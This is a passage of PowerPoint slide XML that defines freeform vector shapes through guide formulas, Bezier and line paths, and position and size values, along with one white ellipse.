                <a:ext cx="314" cy="354"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 79"/>
                  <a:gd name="T1" fmla="*/ 79 h 89"/>
                  <a:gd name="T2" fmla="*/ 16 w 79"/>
                  <a:gd name="T3" fmla="*/ 62 h 89"/>
                  <a:gd name="T4" fmla="*/ 13 w 79"/>
                  <a:gd name="T5" fmla="*/ 9 h 89"/>
                  <a:gd name="T6" fmla="*/ 63 w 79"/>
                  <a:gd name="T7" fmla="*/ 26 h 89"/>
                  <a:gd name="T8" fmla="*/ 66 w 79"/>
                  <a:gd name="T9" fmla="*/ 7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89"/>
                  <a:gd name="T17" fmla="*/ 79 w 79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89">
                    <a:moveTo>
                      <a:pt x="66" y="79"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="89"/>
                      <a:pt x="31" y="81"/>
                      <a:pt x="16" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="43"/>
                      <a:pt x="0" y="19"/>
                      <a:pt x="13" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="0"/>
                      <a:pt x="49" y="7"/>
                      <a:pt x="63" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="45"/>
                      <a:pt x="79" y="69"/>
                      <a:pt x="66" y="79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6" name="Freeform 14557"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5900" y="3082"/>
                <a:ext cx="80" cy="95"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 21"/>
                  <a:gd name="T1" fmla="*/ 22 h 24"/>
                  <a:gd name="T2" fmla="*/ 4 w 21"/>
                  <a:gd name="T3" fmla="*/ 17 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 21"/>
                  <a:gd name="T5" fmla="*/ 3 h 24"/>
                  <a:gd name="T6" fmla="*/ 17 w 21"/>
                  <a:gd name="T7" fmla="*/ 7 h 24"/>
                  <a:gd name="T8" fmla="*/ 18 w 21"/>
                  <a:gd name="T9" fmla="*/ 2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24"/>
                  <a:gd name="T17" fmla="*/ 21 w 21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24">
                    <a:moveTo>
                      <a:pt x="18" y="22"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="24"/>
                      <a:pt x="8" y="22"/>
                      <a:pt x="4" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="12"/>
                      <a:pt x="0" y="5"/>
                      <a:pt x="4" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="13" y="2"/>
                      <a:pt x="17" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="13"/>
                      <a:pt x="21" y="19"/>
                      <a:pt x="18" y="2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7" name="Freeform 14558"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5926" y="3114"/>
                <a:ext cx="28" cy="31"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 7"/>
                  <a:gd name="T1" fmla="*/ 8 h 8"/>
                  <a:gd name="T2" fmla="*/ 1 w 7"/>
                  <a:gd name="T3" fmla="*/ 6 h 8"/>
                  <a:gd name="T4" fmla="*/ 1 w 7"/>
                  <a:gd name="T5" fmla="*/ 1 h 8"/>
                  <a:gd name="T6" fmla="*/ 6 w 7"/>
                  <a:gd name="T7" fmla="*/ 3 h 8"/>
                  <a:gd name="T8" fmla="*/ 6 w 7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8"/>
                  <a:gd name="T17" fmla="*/ 7 w 7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8">
                    <a:moveTo>
                      <a:pt x="6" y="8"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="8"/>
                      <a:pt x="3" y="8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5" y="1"/>
                      <a:pt x="6" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="4"/>
                      <a:pt x="7" y="7"/>
                      <a:pt x="6" y="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8" name="Freeform 14559"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5752" y="2415"/>
                <a:ext cx="562" cy="496"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 336"/>
                  <a:gd name="T1" fmla="*/ 241 h 297"/>
                  <a:gd name="T2" fmla="*/ 213 w 336"/>
                  <a:gd name="T3" fmla="*/ 297 h 297"/>
                  <a:gd name="T4" fmla="*/ 336 w 336"/>
                  <a:gd name="T5" fmla="*/ 85 h 297"/>
                  <a:gd name="T6" fmla="*/ 24 w 336"/>
                  <a:gd name="T7" fmla="*/ 0 h 297"/>
                  <a:gd name="T8" fmla="*/ 0 w 336"/>
                  <a:gd name="T9" fmla="*/ 241 h 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6"/>
                  <a:gd name="T16" fmla="*/ 0 h 297"/>
                  <a:gd name="T17" fmla="*/ 336 w 336"/>
                  <a:gd name="T18" fmla="*/ 297 h 29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6" h="297">
                    <a:moveTo>
                      <a:pt x="0" y="241"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="213" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="24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9" name="Freeform 14560"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6108" y="2535"/>
                <a:ext cx="283" cy="376"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 170"/>
                  <a:gd name="T1" fmla="*/ 226 h 226"/>
                  <a:gd name="T2" fmla="*/ 40 w 170"/>
                  <a:gd name="T3" fmla="*/ 215 h 226"/>
                  <a:gd name="T4" fmla="*/ 170 w 170"/>
                  <a:gd name="T5" fmla="*/ 0 h 226"/>
                  <a:gd name="T6" fmla="*/ 123 w 170"/>
                  <a:gd name="T7" fmla="*/ 14 h 226"/>
                  <a:gd name="T8" fmla="*/ 0 w 170"/>
                  <a:gd name="T9" fmla="*/ 224 h 226"/>
                  <a:gd name="T10" fmla="*/ 0 w 170"/>
                  <a:gd name="T11" fmla="*/ 226 h 2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0"/>
                  <a:gd name="T19" fmla="*/ 0 h 226"/>
                  <a:gd name="T20" fmla="*/ 170 w 170"/>
                  <a:gd name="T21" fmla="*/ 226 h 2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0" h="226">
                    <a:moveTo>
                      <a:pt x="0" y="226"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="40" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2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0" name="Freeform 14561"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6108" y="2535"/>
                <a:ext cx="283" cy="376"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 170"/>
                  <a:gd name="T1" fmla="*/ 226 h 226"/>
                  <a:gd name="T2" fmla="*/ 40 w 170"/>
                  <a:gd name="T3" fmla="*/ 215 h 226"/>
                  <a:gd name="T4" fmla="*/ 170 w 170"/>
                  <a:gd name="T5" fmla="*/ 0 h 226"/>
                  <a:gd name="T6" fmla="*/ 123 w 170"/>
                  <a:gd name="T7" fmla="*/ 14 h 226"/>
                  <a:gd name="T8" fmla="*/ 0 w 170"/>
                  <a:gd name="T9" fmla="*/ 224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0"/>
                  <a:gd name="T16" fmla="*/ 0 h 226"/>
                  <a:gd name="T17" fmla="*/ 170 w 170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0" h="226">
                    <a:moveTo>
                      <a:pt x="0" y="226"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="40" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="224"/>
                    </a:lnTo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1" name="Freeform 14562"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1455" y="1425"/>
                <a:ext cx="265" cy="294"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 53 w 67"/>
                  <a:gd name="T1" fmla="*/ 21 h 74"/>
                  <a:gd name="T2" fmla="*/ 15 w 67"/>
                  <a:gd name="T3" fmla="*/ 5 h 74"/>
                  <a:gd name="T4" fmla="*/ 15 w 67"/>
                  <a:gd name="T5" fmla="*/ 5 h 74"/>
                  <a:gd name="T6" fmla="*/ 4 w 67"/>
                  <a:gd name="T7" fmla="*/ 8 h 74"/>
                  <a:gd name="T8" fmla="*/ 6 w 67"/>
                  <a:gd name="T9" fmla="*/ 12 h 74"/>
                  <a:gd name="T10" fmla="*/ 13 w 67"/>
                  <a:gd name="T11" fmla="*/ 52 h 74"/>
                  <a:gd name="T12" fmla="*/ 32 w 67"/>
                  <a:gd name="T13" fmla="*/ 68 h 74"/>
                  <a:gd name="T14" fmla="*/ 34 w 67"/>
                  <a:gd name="T15" fmla="*/ 74 h 74"/>
                  <a:gd name="T16" fmla="*/ 49 w 67"/>
                  <a:gd name="T17" fmla="*/ 70 h 74"/>
                  <a:gd name="T18" fmla="*/ 49 w 67"/>
                  <a:gd name="T19" fmla="*/ 70 h 74"/>
                  <a:gd name="T20" fmla="*/ 56 w 67"/>
                  <a:gd name="T21" fmla="*/ 67 h 74"/>
                  <a:gd name="T22" fmla="*/ 53 w 67"/>
                  <a:gd name="T23" fmla="*/ 21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7"/>
                  <a:gd name="T37" fmla="*/ 0 h 74"/>
                  <a:gd name="T38" fmla="*/ 67 w 67"/>
                  <a:gd name="T39" fmla="*/ 74 h 7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7" h="74">
                    <a:moveTo>
                      <a:pt x="53" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="7"/>
                      <a:pt x="26" y="0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0" y="22"/>
                      <a:pt x="2" y="39"/>
                      <a:pt x="13" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="59"/>
                      <a:pt x="25" y="65"/>
                      <a:pt x="32" y="68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1" y="69"/>
                      <a:pt x="54" y="68"/>
                      <a:pt x="56" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="58"/>
                      <a:pt x="66" y="38"/>
                      <a:pt x="53" y="21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2" name="Freeform 14563"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1398" y="1433"/>
                <a:ext cx="265" cy="306"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 57 w 68"/>
                  <a:gd name="T1" fmla="*/ 69 h 77"/>
                  <a:gd name="T2" fmla="*/ 14 w 68"/>
                  <a:gd name="T3" fmla="*/ 54 h 77"/>
                  <a:gd name="T4" fmla="*/ 11 w 68"/>
                  <a:gd name="T5" fmla="*/ 9 h 77"/>
                  <a:gd name="T6" fmla="*/ 54 w 68"/>
                  <a:gd name="T7" fmla="*/ 23 h 77"/>
                  <a:gd name="T8" fmla="*/ 57 w 68"/>
                  <a:gd name="T9" fmla="*/ 69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"/>
                  <a:gd name="T16" fmla="*/ 0 h 77"/>
                  <a:gd name="T17" fmla="*/ 68 w 68"/>
                  <a:gd name="T18" fmla="*/ 77 h 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" h="77">
                    <a:moveTo>
                      <a:pt x="57" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="77"/>
                      <a:pt x="26" y="71"/>
                      <a:pt x="14" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="38"/>
                      <a:pt x="0" y="17"/>
                      <a:pt x="11" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="0"/>
                      <a:pt x="42" y="7"/>
                      <a:pt x="54" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="40"/>
                      <a:pt x="68" y="60"/>
                      <a:pt x="57" y="69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3" name="Freeform 14564"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1495" y="1545"/>
                <a:ext cx="71" cy="82"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 15 w 18"/>
                  <a:gd name="T1" fmla="*/ 19 h 21"/>
                  <a:gd name="T2" fmla="*/ 3 w 18"/>
                  <a:gd name="T3" fmla="*/ 15 h 21"/>
                  <a:gd name="T4" fmla="*/ 3 w 18"/>
                  <a:gd name="T5" fmla="*/ 3 h 21"/>
                  <a:gd name="T6" fmla="*/ 15 w 18"/>
                  <a:gd name="T7" fmla="*/ 7 h 21"/>
                  <a:gd name="T8" fmla="*/ 15 w 18"/>
                  <a:gd name="T9" fmla="*/ 1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21"/>
                  <a:gd name="T17" fmla="*/ 18 w 18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21">
                    <a:moveTo>
                      <a:pt x="15" y="19"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="21"/>
                      <a:pt x="7" y="19"/>
                      <a:pt x="3" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="10"/>
                      <a:pt x="0" y="5"/>
                      <a:pt x="3" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="0"/>
                      <a:pt x="11" y="2"/>
                      <a:pt x="15" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="11"/>
                      <a:pt x="18" y="16"/>
                      <a:pt x="15" y="1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4" name="Freeform 14565"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1520" y="1570"/>
                <a:ext cx="23" cy="29"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 6"/>
                  <a:gd name="T1" fmla="*/ 7 h 7"/>
                  <a:gd name="T2" fmla="*/ 1 w 6"/>
                  <a:gd name="T3" fmla="*/ 5 h 7"/>
                  <a:gd name="T4" fmla="*/ 1 w 6"/>
                  <a:gd name="T5" fmla="*/ 1 h 7"/>
                  <a:gd name="T6" fmla="*/ 5 w 6"/>
                  <a:gd name="T7" fmla="*/ 2 h 7"/>
                  <a:gd name="T8" fmla="*/ 5 w 6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7"/>
                  <a:gd name="T17" fmla="*/ 6 w 6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7">
                    <a:moveTo>
                      <a:pt x="5" y="7"/>
                    </a:move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2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="4"/>
                      <a:pt x="6" y="6"/>
                      <a:pt x="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5" name="Freeform 14566"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1452" y="1393"/>
                <a:ext cx="83" cy="177"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 21"/>
                  <a:gd name="T1" fmla="*/ 0 h 45"/>
                  <a:gd name="T2" fmla="*/ 0 w 21"/>
                  <a:gd name="T3" fmla="*/ 42 h 45"/>
                  <a:gd name="T4" fmla="*/ 11 w 21"/>
                  <a:gd name="T5" fmla="*/ 45 h 45"/>
                  <a:gd name="T6" fmla="*/ 21 w 21"/>
                  <a:gd name="T7" fmla="*/ 42 h 45"/>
                  <a:gd name="T8" fmla="*/ 21 w 21"/>
                  <a:gd name="T9" fmla="*/ 0 h 45"/>
                  <a:gd name="T10" fmla="*/ 0 w 21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45"/>
                  <a:gd name="T20" fmla="*/ 21 w 21"/>
                  <a:gd name="T21" fmla="*/ 45 h 4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45">
                    <a:moveTo>
                      <a:pt x="0" y="0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0" y="43"/>
                      <a:pt x="5" y="45"/>
                      <a:pt x="11" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="45"/>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="0"/>
                      <a:pt x="21" y="0"/>
                      <a:pt x="2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6" name="Oval 14567"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1452" y="1385"/>
                <a:ext cx="83" cy="20"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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7" name="Freeform 14568"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1435" y="1228"/>
                <a:ext cx="117" cy="197"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 29"/>
                  <a:gd name="T1" fmla="*/ 0 h 50"/>
                  <a:gd name="T2" fmla="*/ 0 w 29"/>
                  <a:gd name="T3" fmla="*/ 46 h 50"/>
                  <a:gd name="T4" fmla="*/ 15 w 29"/>
                  <a:gd name="T5" fmla="*/ 50 h 50"/>
                  <a:gd name="T6" fmla="*/ 29 w 29"/>
                  <a:gd name="T7" fmla="*/ 46 h 50"/>
                  <a:gd name="T8" fmla="*/ 29 w 29"/>
                  <a:gd name="T9" fmla="*/ 0 h 50"/>
                  <a:gd name="T10" fmla="*/ 0 w 29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9"/>
                  <a:gd name="T19" fmla="*/ 0 h 50"/>
                  <a:gd name="T20" fmla="*/ 29 w 29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9" h="50">
                    <a:moveTo>
                      <a:pt x="0" y="0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0" y="48"/>
                      <a:pt x="7" y="50"/>
                      <a:pt x="15" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="50"/>
                      <a:pt x="29" y="48"/>
                      <a:pt x="29" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="0"/>
                      <a:pt x="29" y="0"/>
                      <a:pt x="2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8" name="Freeform 14569"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1403" y="1162"/>
                <a:ext cx="180" cy="174"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 45"/>
                  <a:gd name="T1" fmla="*/ 0 h 44"/>
                  <a:gd name="T2" fmla="*/ 0 w 45"/>
                  <a:gd name="T3" fmla="*/ 38 h 44"/>
                  <a:gd name="T4" fmla="*/ 23 w 45"/>
                  <a:gd name="T5" fmla="*/ 44 h 44"/>
                  <a:gd name="T6" fmla="*/ 45 w 45"/>
                  <a:gd name="T7" fmla="*/ 38 h 44"/>
                  <a:gd name="T8" fmla="*/ 45 w 45"/>
                  <a:gd name="T9" fmla="*/ 0 h 44"/>
                  <a:gd name="T10" fmla="*/ 0 w 45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5"/>
                  <a:gd name="T19" fmla="*/ 0 h 44"/>
                  <a:gd name="T20" fmla="*/ 45 w 45"/>
                  <a:gd name="T21" fmla="*/ 44 h 4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5" h="44">
                    <a:moveTo>
                      <a:pt x="0" y="0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42"/>
                      <a:pt x="10" y="44"/>
                      <a:pt x="23" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="44"/>
                      <a:pt x="45" y="42"/>
                      <a:pt x="45" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="0"/>
                      <a:pt x="45" y="0"/>
                      <a:pt x="4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9" name="Freeform 14570"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1318" y="1467"/>
                <a:ext cx="265" cy="289"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 53 w 67"/>
                  <a:gd name="T1" fmla="*/ 21 h 74"/>
                  <a:gd name="T2" fmla="*/ 14 w 67"/>
                  <a:gd name="T3" fmla="*/ 4 h 74"/>
                  <a:gd name="T4" fmla="*/ 14 w 67"/>
                  <a:gd name="T5" fmla="*/ 4 h 74"/>
                  <a:gd name="T6" fmla="*/ 4 w 67"/>
                  <a:gd name="T7" fmla="*/ 7 h 74"/>
                  <a:gd name="T8" fmla="*/ 6 w 67"/>
                  <a:gd name="T9" fmla="*/ 12 h 74"/>
                  <a:gd name="T10" fmla="*/ 13 w 67"/>
                  <a:gd name="T11" fmla="*/ 52 h 74"/>
                  <a:gd name="T12" fmla="*/ 31 w 67"/>
                  <a:gd name="T13" fmla="*/ 67 h 74"/>
                  <a:gd name="T14" fmla="*/ 34 w 67"/>
                  <a:gd name="T15" fmla="*/ 74 h 74"/>
                  <a:gd name="T16" fmla="*/ 49 w 67"/>
                  <a:gd name="T17" fmla="*/ 70 h 74"/>
                  <a:gd name="T18" fmla="*/ 49 w 67"/>
                  <a:gd name="T19" fmla="*/ 70 h 74"/>
                  <a:gd name="T20" fmla="*/ 56 w 67"/>
                  <a:gd name="T21" fmla="*/ 67 h 74"/>
                  <a:gd name="T22" fmla="*/ 53 w 67"/>
                  <a:gd name="T23" fmla="*/ 21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7"/>
                  <a:gd name="T37" fmla="*/ 0 h 74"/>
                  <a:gd name="T38" fmla="*/ 67 w 67"/>
                  <a:gd name="T39" fmla="*/ 74 h 7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7" h="74">
                    <a:moveTo>
                      <a:pt x="53" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="7"/>
                      <a:pt x="26" y="0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0" y="22"/>
                      <a:pt x="2" y="38"/>
                      <a:pt x="13" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="59"/>
                      <a:pt x="25" y="64"/>
                      <a:pt x="31" y="67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1" y="69"/>
                      <a:pt x="54" y="68"/>
                      <a:pt x="56" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="58"/>
                      <a:pt x="66" y="38"/>
                      <a:pt x="53" y="21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0" name="Freeform 14571"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1258" y="1473"/>
                <a:ext cx="271" cy="303"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 57 w 68"/>
                  <a:gd name="T1" fmla="*/ 68 h 77"/>
                  <a:gd name="T2" fmla="*/ 14 w 68"/>
                  <a:gd name="T3" fmla="*/ 54 h 77"/>
                  <a:gd name="T4" fmla="*/ 11 w 68"/>
                  <a:gd name="T5" fmla="*/ 9 h 77"/>
                  <a:gd name="T6" fmla="*/ 54 w 68"/>
                  <a:gd name="T7" fmla="*/ 23 h 77"/>
                  <a:gd name="T8" fmla="*/ 57 w 68"/>
                  <a:gd name="T9" fmla="*/ 68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"/>
                  <a:gd name="T16" fmla="*/ 0 h 77"/>
                  <a:gd name="T17" fmla="*/ 68 w 68"/>
                  <a:gd name="T18" fmla="*/ 77 h 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" h="77">
                    <a:moveTo>
                      <a:pt x="57" y="68"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="77"/>
                      <a:pt x="26" y="70"/>
                      <a:pt x="14" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="37"/>
                      <a:pt x="0" y="17"/>
                      <a:pt x="11" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="0"/>
                      <a:pt x="42" y="7"/>
                      <a:pt x="54" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="39"/>
                      <a:pt x="68" y="60"/>
                      <a:pt x="57" y="68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1" name="Freeform 14572"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1358" y="1582"/>
                <a:ext cx="71" cy="85"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 15 w 18"/>
                  <a:gd name="T1" fmla="*/ 19 h 21"/>
                  <a:gd name="T2" fmla="*/ 3 w 18"/>
                  <a:gd name="T3" fmla="*/ 15 h 21"/>
                  <a:gd name="T4" fmla="*/ 3 w 18"/>
                  <a:gd name="T5" fmla="*/ 2 h 21"/>
                  <a:gd name="T6" fmla="*/ 14 w 18"/>
                  <a:gd name="T7" fmla="*/ 6 h 21"/>
                  <a:gd name="T8" fmla="*/ 15 w 18"/>
                  <a:gd name="T9" fmla="*/ 1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21"/>
                  <a:gd name="T17" fmla="*/ 18 w 18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21">
                    <a:moveTo>
                      <a:pt x="15" y="19"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="21"/>
                      <a:pt x="7" y="19"/>
                      <a:pt x="3" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="10"/>
                      <a:pt x="0" y="5"/>
                      <a:pt x="3" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="0"/>
                      <a:pt x="11" y="2"/>
                      <a:pt x="14" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="11"/>
                      <a:pt x="18" y="16"/>
                      <a:pt x="15" y="1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2" name="Freeform 14573"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1381" y="1610"/>
                <a:ext cx="22" cy="29"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 6"/>
                  <a:gd name="T1" fmla="*/ 6 h 7"/>
                  <a:gd name="T2" fmla="*/ 1 w 6"/>
                  <a:gd name="T3" fmla="*/ 5 h 7"/>
                  <a:gd name="T4" fmla="*/ 1 w 6"/>
                  <a:gd name="T5" fmla="*/ 1 h 7"/>
                  <a:gd name="T6" fmla="*/ 5 w 6"/>
                  <a:gd name="T7" fmla="*/ 2 h 7"/>
                  <a:gd name="T8" fmla="*/ 5 w 6"/>
                  <a:gd name="T9" fmla="*/ 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7"/>
                  <a:gd name="T17" fmla="*/ 6 w 6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7">
                    <a:moveTo>
                      <a:pt x="5" y="6"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="7"/>
                      <a:pt x="2" y="6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6" y="4"/>
                      <a:pt x="6" y="5"/>
                      <a:pt x="5" y="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3" name="Freeform 14574"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5837" y="-367"/>
                <a:ext cx="4626" cy="1997"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2775"/>
                  <a:gd name="T1" fmla="*/ 789 h 1198"/>
                  <a:gd name="T2" fmla="*/ 1495 w 2775"/>
                  <a:gd name="T3" fmla="*/ 1198 h 1198"/>
                  <a:gd name="T4" fmla="*/ 2043 w 2775"/>
                  <a:gd name="T5" fmla="*/ 706 h 1198"/>
                  <a:gd name="T6" fmla="*/ 2775 w 2775"/>
                  <a:gd name="T7" fmla="*/ 95 h 1198"/>
                  <a:gd name="T8" fmla="*/ 2426 w 2775"/>
                  <a:gd name="T9" fmla="*/ 0 h 1198"/>
                  <a:gd name="T10" fmla="*/ 0 w 2775"/>
